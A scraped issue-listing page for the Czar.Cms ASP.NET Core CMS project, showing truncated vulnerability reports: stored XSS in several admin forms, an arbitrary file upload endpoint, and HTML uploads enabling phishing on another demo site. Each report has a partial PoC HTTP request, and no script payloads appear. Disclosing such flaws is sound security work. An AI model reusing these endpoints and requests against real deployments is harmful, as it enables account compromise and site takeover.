Czar.Cms
Czar.Cms copied to clipboard
yilezhu
.NET Core实战项目之CMS系列教程的源码,精简而又功能丰富的权限设计,内容管理设计让你轻松搭建一个ASP.NET Core2.2的网站系统.此项目准备用EFCore进行重构,敬请期待
Background system management menu management task management Add task storage xss poc ` POST /TaskInfo/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 492 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows...
Background system management menu management Add menu exists to store xss poc ` POST /Menu/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 137 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows...
Background system management - role management - add role exists to store xss poc `POST /ManagerRole/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 104 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0...
Add users in the background - there is xss in the remarks poc ` POST /Manager/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 141 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0...
Arbitrary file upload vulnerability exists in the background poc POST /File/UploadImage/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 1429836 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)...
Can upload Html Cause fishing attacks , JavaScript Code execution  url :http://demo.zkea.net/admin/media/upload poc : -----------------------------189153225812082 Content-Disposition: form-data; name="file"; filename="test.html" Content-Type: application/octet-stream hello world! -----------------------------189153225812082 Content-Disposition: form-data; name="parentId" # -----------------------------189153225812082...
